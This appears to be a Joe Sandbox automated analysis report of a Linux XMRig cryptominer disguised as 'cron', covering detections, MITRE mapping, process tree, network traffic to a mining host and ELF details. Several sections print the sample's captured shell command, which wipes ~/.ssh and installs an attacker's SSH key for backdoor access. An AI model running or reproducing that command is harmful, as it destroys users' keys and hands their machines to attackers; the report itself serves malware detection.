Loading ...

Play interactive tourEdit tour

Analysis Report cron

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:202041
Start date:20.01.2020
Start time:02:54:41
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 7s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:cron
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal76.troj.mine.lin@0/2@4/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 91.189.92.20, 91.189.92.19, 91.189.92.41, 91.189.92.38
  • Excluded domains from analysis (whitelisted): api.snapcraft.io

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold760 - 100false
Xmrig
malicious

Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand-Line Interface1Hidden Files and Directories1Port MonitorsHidden Files and Directories1Credential DumpingSecurity Software Discovery1Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting1Port MonitorsAccessibility FeaturesFile and Directory Permissions Modification1Network SniffingFile and Directory Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionScripting1Input CaptureSystem Information Discovery3Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingFile Deletion1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for sampleShow sources
Source: cronAvira: detection malicious, Label: LINUX/BitCoinMiner.cgymm
Multi AV Scanner detection for submitted fileShow sources
Source: cronVirustotal: Detection: 40%Perma Link

Bitcoin Miner:

barindex
Yara detected Xmrig cryptocurrency minerShow sources
Source: Yara matchFile source: cron, type: SAMPLE
Detected Stratum mining protocolShow sources
Source: global trafficTCP traffic: 192.168.2.20:45164 -> 45.9.148.125:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 35 42 4c 41 76 4c 4e 61 79 65 66 71 4e 61 64 33 74 47 70 48 4b 50 7a 76 69 51 55 59 48 46 31 6d 43 61 70 4d 68 67 52 75 69 69 41 4a 50 59 58 34 4b 79 52 43 56 67 39 76 65 54 6d 63 6b 50 4e 37 62 44 65 62 78 35 31 4c 43 75 44 51 59 79 68 46 67 56 62 55 4d 68 63 34 71 59 31 34 43 51 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 35 2e 35 2e 30 20 28 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 34 2e 30 20 67 63 63 2f 38 2e 33 2e 30 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e 2f 31 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65
Found strings related to Crypto-MiningShow sources
Source: cronString found in binary or memory: stratum+ssl://
Source: cronString found in binary or memory: cryptonight/0
Source: cronString found in binary or memory: -o, --url=URL URL of mining server
Source: cronString found in binary or memory: stratum+tcp://
Source: cronString found in binary or memory: XMRig
Source: cronString found in binary or memory: Usage: xmrig [OPTIONS]
Reads CPU information from /proc indicative of miner or evasive malwareShow sources
Source: /tmp/cron (PID: 20755)Reads CPU info from proc file: /proc/cpuinfo
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblings
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_siblings
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/possible

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: debian-package.center
Urls found in memory or binary dataShow sources
Source: cronString found in binary or memory: https://gcc.gnu.org/bugs/):
Source: cronString found in binary or memory: https://xmrig.com/docs/algorithms

System Summary:

barindex
Sample contains strings that are potentially command stringsShow sources
Source: Initial samplePotential command found: w ATI
Source: Initial samplePotential command found: cmp r,i
Source: Initial samplePotential command found: file already exists
Source: Initial samplePotential command found: file too large
Source: Initial samplePotential command found: host is unreachable
Source: Initial samplePotential command found: file table overflow
Source: Initial samplePotential command found: host is down
Source: Initial samplePotential command found: service not available for socket type
Source: Initial samplePotential command found: w == &loop->async_io_watcher
Source: Initial samplePotential command found: start + CMSG_LEN(count * sizeof(*pi)) == end
Source: Initial samplePotential command found: timeout >= -1
Source: Initial samplePotential command found: timeout != -1
Source: Initial samplePotential command found: timeout > 0
Source: Initial samplePotential command found: size > 0
Source: Initial samplePotential command found: w != NULL
Source: Initial samplePotential command found: start + CMSG_LEN(count * sizeof(*pi)) == endreq->handle->write_queue_size >= sizeuv__has_active_reqs(stream->loop)stream->type == UV_TCP || stream->type == UV_NAMED_PIPE || stream->type == UV_TTY!(stream->flags & UV_HANDLE_CLOSING)stream->type == UV_TCP || stream->type == UV_NAMED_PIPE!uv__io_active(&stream->io_watcher, POLLIN | POLLOUT)stream->flags & UV_HANDLE_CLOSEDstream->type == UV_TCP || stream->type == UV_TTY || stream->type == UV_NAMED_PIPE(stream->type == UV_TCP || stream->type == UV_NAMED_PIPE || stream->type == UV_TTY) && "uv_write (unix) does not yet support other types of streams"!(stream->flags & UV_HANDLE_BLOCKING_WRITES)!uv__io_active(&handle->io_watcher, POLLIN | POLLOUT)uv__stream_closeuv_read_startuv_try_writeuv_write2uv_shutdownuv_acceptuv__server_iouv__stream_destroyuv__stream_openuv__drainuv__write_req_sizeuv__write_callbacksuv__write_req_updateuv__writeuv__stream_recv_cmsguv__readuv__stream_connectuv__stream_iosrc/unix/tcp.chandle->type == UV_TCPUV_TCP_SINGLE_ACCEPTuv__tcp_connectsrc/un
Source: Initial samplePotential command found: last == hwloc_get_obj_by_depth(topology, depth, width-1)
Source: Initial samplePotential command found: last != -1
Sample has stripped symbol tableShow sources
Source: ELF static info symbol of initial sample.symtab present: no
Classification labelShow sources
Source: classification engineClassification label: mal76.troj.mine.lin@0/2@4/0

Persistence and Installation Behavior:

barindex
Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
Source: /tmp/cron (PID: 20755)File: /proc/20755/mounts
Counts the number of processes currently runningShow sources
Source: /tmp/cron (PID: 20758)Ps with wc executed: /bin/sh -> sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
Creates hidden files and/or directoriesShow sources
Source: /bin/mkdir (PID: 20762)Directory: .ssh
Executes commands using a shell command-line interpreterShow sources
Source: /tmp/cron (PID: 20758)Shell command executed: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/sh (PID: 20768)Chmod executable: /bin/chmod -> chmod -R go= /home/user/.ssh
Executes the "mkdir" command used to create foldersShow sources
Source: /bin/sh (PID: 20762)Mkdir executable: /bin/mkdir -> mkdir .ssh
Executes the "rm" command used to delete files or directoriesShow sources
Source: /bin/sh (PID: 20760)Rm executable: /bin/rm -> rm -rf .ssh
Reads system information from the proc file systemShow sources
Source: /tmp/cron (PID: 20755)Reads from proc file: /proc/cpuinfo
Source: /tmp/cron (PID: 20755)Reads from proc file: /proc/meminfo
Source: /tmp/cron (PID: 20772)Reads from proc file: /proc/meminfo
Sample tries to set the executable flagShow sources
Source: /bin/chmod (PID: 20768)File: /home/user/.ssh (bits: - usr: - grp: - all: rwx)

Malware Analysis System Evasion:

barindex
Reads CPU information from /proc indicative of miner or evasive malwareShow sources
Source: /tmp/cron (PID: 20755)Reads CPU info from proc file: /proc/cpuinfo
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblings
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_siblings
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: /tmp/cron (PID: 20755)Reads CPU info from /sys: /sys/devices/system/cpu/possible
Uses the "uname" system call to query kernel version information (possible evasion)Show sources
Source: /tmp/cron (PID: 20755)Queries kernel information via 'uname':

Malware Configuration

No configs have been found


Runtime Messages

Command:/tmp/cron
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:[2020-01-20 03:55:23.995] unable to open '/tmp/config.json'.
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 202041 Sample: cron Startdate: 20/01/2020 Architecture: LINUX Score: 76 21 45.9.148.125, 45164, 80 unknown Netherlands 2->21 23 debian-package.center 2->23 25 Antivirus detection for sample 2->25 27 Multi AV Scanner detection for submitted file 2->27 29 Yara detected Xmrig cryptocurrency miner 2->29 31 2 other signatures 2->31 8 cron 2->8         started        signatures3 process4 signatures5 33 Sample reads /proc/mounts (often used for finding a writable filesystem) 8->33 11 cron sh 8->11         started        13 cron 8->13         started        process6 process7 15 sh rm 11->15         started        17 sh mkdir 11->17         started        19 sh chmod 11->19         started       

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
cronJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    PCAP (Network Traffic)

    No yara matches

    Dropped Files

    No yara matches

    Sigma Overview

    No Sigma rule has matched

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    45.9.148.125anacronGet hashmaliciousBrowse
      cronGet hashmaliciousBrowse
        cQLmNrunGet hashmaliciousBrowse

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          debian-package.centeranacronGet hashmaliciousBrowse
          • 45.9.148.117
          cronGet hashmaliciousBrowse
          • 45.9.148.129
          cronGet hashmaliciousBrowse
          • 45.9.148.129

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          unknownanacronGet hashmaliciousBrowse
          • 45.9.148.125
          testfileGet hashmaliciousBrowse
          • 91.189.92.20
          Launcher.apkGet hashmaliciousBrowse
          • 216.58.201.99
          http://5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi%20portafilter%20sizeGet hashmaliciousBrowse
          • 185.211.246.22
          http://5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi portafilter sizeGet hashmaliciousBrowse
          • 185.211.246.22
          Project2.docGet hashmaliciousBrowse
          • 51.15.6.128
          https://top4top.io/downloadf-11687unj01-rar.htmlGet hashmaliciousBrowse
          • 54.38.152.27
          http://www.ltyuye.com/wp-admin/rrktd1y-1v-75/Get hashmaliciousBrowse
          • 23.235.217.105
          http://txfc58.com/wordpress/m2utbn-3ft4c-07947/Get hashmaliciousBrowse
          • 185.216.113.122
          instructions 01 18 2020.docGet hashmaliciousBrowse
          • 23.235.217.105
          instructions 01 18 2020.docGet hashmaliciousBrowse
          • 217.160.5.123
          PO987889-JAN-20-20-Order_Quote,pdf.exeGet hashmaliciousBrowse
          • 172.217.23.193
          koadic_test_online_9997_rundll.vbsGet hashmaliciousBrowse
          • 79.137.36.9
          http://www.searchnewtabs.com/downloadGet hashmaliciousBrowse
          • 52.206.61.22
          http://91.92.66.124/..j/Get hashmaliciousBrowse
          • 91.92.66.124
          https://gcc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsway.office.com%2FUN0jHy70XUb7BIXa%3Fref%3DLink&data=02%7C01%7Cjh.jackson%40trade.gov%7Cc3e4a0c456a7407e91f408d79a641704%7Ca1d183f26c7b4d9ab9945f2f31b3f780%7C1%7C1%7C637147626986386689&sdata=AhWGM0VN8KygMfO7X6%2FHVaDVvk7tiKzPkuCoZ%2FooVfs%3D&reserved=0Get hashmaliciousBrowse
          • 209.197.3.24
          http://95.179.163.186Get hashmaliciousBrowse
          • 95.179.163.186
          https://perfecttux.comGet hashmaliciousBrowse
          • 147.75.84.39
          INVOICE FAF3766_778982019.docGet hashmaliciousBrowse
          • 185.216.113.122
          INVOICE FAF3766_778982019.docGet hashmaliciousBrowse
          • 217.160.5.123

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          cron41%VirustotalBrowse
          cron100%AviraLINUX/BitCoinMiner.cgymm

          Dropped Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          debian-package.center0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://xmrig.com/docs/algorithms0%VirustotalBrowse
          https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe

          Startup

          • system is lnxubuntu1
          • cron (PID: 20755, Parent: 20706, MD5: 84945e9ea1950be3e870b798bd7c7559) Arguments: /tmp/cron
            • cron New Fork (PID: 20758, Parent: 20755)
            • sh (PID: 20758, Parent: 20755, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
              • sh New Fork (PID: 20760, Parent: 20758)
              • rm (PID: 20760, Parent: 20758, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh
              • sh New Fork (PID: 20762, Parent: 20758)
              • mkdir (PID: 20762, Parent: 20758, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh
              • sh New Fork (PID: 20768, Parent: 20758)
              • chmod (PID: 20768, Parent: 20758, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh
            • cron New Fork (PID: 20772, Parent: 20755)
          • cleanup

          Created / dropped Files

          /home/user/.ssh/authorized_keys
          Process:/bin/sh
          File Type:OpenSSH RSA public key
          Size (bytes):389
          Entropy (8bit):5.91239652812259
          Encrypted:false
          MD5:A420F7A60A40F3FF3A806A01FEB1DFDA
          SHA1:1AE65132B036DE51BCC62F66B51AE362E11182AF
          SHA-256:A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2
          SHA-512:1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF
          Malicious:false
          Reputation:low
          Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr.
          /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
          Process:/tmp/cron
          File Type:ASCII text, with no line terminators
          Size (bytes):6
          Entropy (8bit):1.9182958340544893
          Encrypted:false
          MD5:1054DD099E3998ACB4C217F5AE41D8C8
          SHA1:9F649342B81C46321145FB8F13EDD0F61487F1B4
          SHA-256:498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A
          SHA-512:03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7
          Malicious:false
          Reputation:low
          Preview: 128129

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          debian-package.center
          45.9.148.117
          truefalseunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://gcc.gnu.org/bugs/):cronfalse
            high
            https://xmrig.com/docs/algorithmscronfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPCountryFlagASNASN NameMalicious
            45.9.148.125
            Netherlands
            49447unknowntrue

            Static File Info

            General

            File type:ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
            Entropy (8bit):6.344544956625536
            TrID:
            • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
            • ELF Executable and Linkable format (generic) (4004/1) 49.46%
            • Lumena CEL bitmap (63/63) 0.78%
            File name:cron
            File size:2401096
            MD5:84945e9ea1950be3e870b798bd7c7559
            SHA1:95b4a0e956499b8ea07cd5e880ac7dd2d88131c1
            SHA256:fd9007df08c1bd2cf47fb97443c4d7360e204f4d8fe48c5d603373b2b2975708
            SHA512:0b3c5075f9dde4d316aca1d3ba393a4e69288a1af5c05d1b3e309ddefcd653f3e3a5a8dd859a846ad2a5a34b381b34f9809a6e85ded408ec4b1b9c7964ebaabd
            SSDEEP:49152:10cWKu0K8CpxlJWhabW/////////In6C1NdvKODyYGhiDC61N04EXBJDJw5qjURX:+d08xrbW/////////viu6T0lXBJDJwE2
            File Content Preview:.ELF..............>.............@.........$.........@.8...@......................................V.......V.......................`.......`.......`......8.......8........................ ....... ....... ......................................@.#.....@.$....

            Static ELF Info

            ELF header

            Class:ELF64
            Data:2's complement, little endian
            Version:1 (current)
            Machine:Advanced Micro Devices X86-64
            Version Number:0x1
            Type:DYN (Shared object file)
            OS/ABI:UNIX - System V
            ABI Version:0
            Entry Point Address:0x195e7
            Flags:0x0
            ELF Header Size:64
            Program Header Offset:64
            Program Header Size:56
            Number of Program Headers:9
            Section Header Offset:2399496
            Section Header Size:64
            Number of Section Headers:25
            Header String Table Index:24

            Sections

            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .gnu.hashGNU_HASH0x2380x2380x1c0x00x2A208
            .dynsymDYNSYM0x2580x2580x180x180x2A318
            .dynstrSTRTAB0x2700x2700x10x00x2A001
            .rela.dynRELA0x2780x2780x154800x180x2A208
            .initPROGBITS0x160000x160000xd0x00x6AX001
            .pltPROGBITS0x160100x160100x900x100x6AX0016
            .textPROGBITS0x160c00x160c00x1bba700x00x6AX0064
            .finiPROGBITS0x1d1b300x1d1b300x80x00x6AX001
            .rodataPROGBITS0x1d20000x1d20000x1cef00x00x2A0032
            .eh_frame_hdrPROGBITS0x1eeef00x1eeef00xc18c0x00x2A004
            .eh_framePROGBITS0x1fb0800x1fb0800x3eb900x00x2A008
            .gcc_except_tablePROGBITS0x239c100x239c100x5d080x00x2A004
            .tbssNOBITS0x240c400x23fc400x200x00x403WAT008
            .init_arrayINIT_ARRAY0x240c400x23fc400x1080x80x3WA008
            .fini_arrayFINI_ARRAY0x240d480x23fd480x180x80x3WA008
            .ctorsPROGBITS0x240d600x23fd600x100x00x3WA008
            .dtorsPROGBITS0x240d700x23fd700x100x00x3WA008
            .data.rel.roPROGBITS0x240d800x23fd800x8ed00x00x3WA0032
            .dynamicDYNAMIC0x249c500x248c500x1900x100x3WA308
            .gotPROGBITS0x249de00x248de00x2080x80x3WA008
            .dataPROGBITS0x24a0000x2490000xc180x00x3WA0032
            .bssNOBITS0x24ac400x249c180xdaa80x00x3WA0064
            .commentPROGBITS0x00x249c180x1a0x10x30MS001
            .shstrtabSTRTAB0x00x249c320xd30x00x0001

            Program Segments

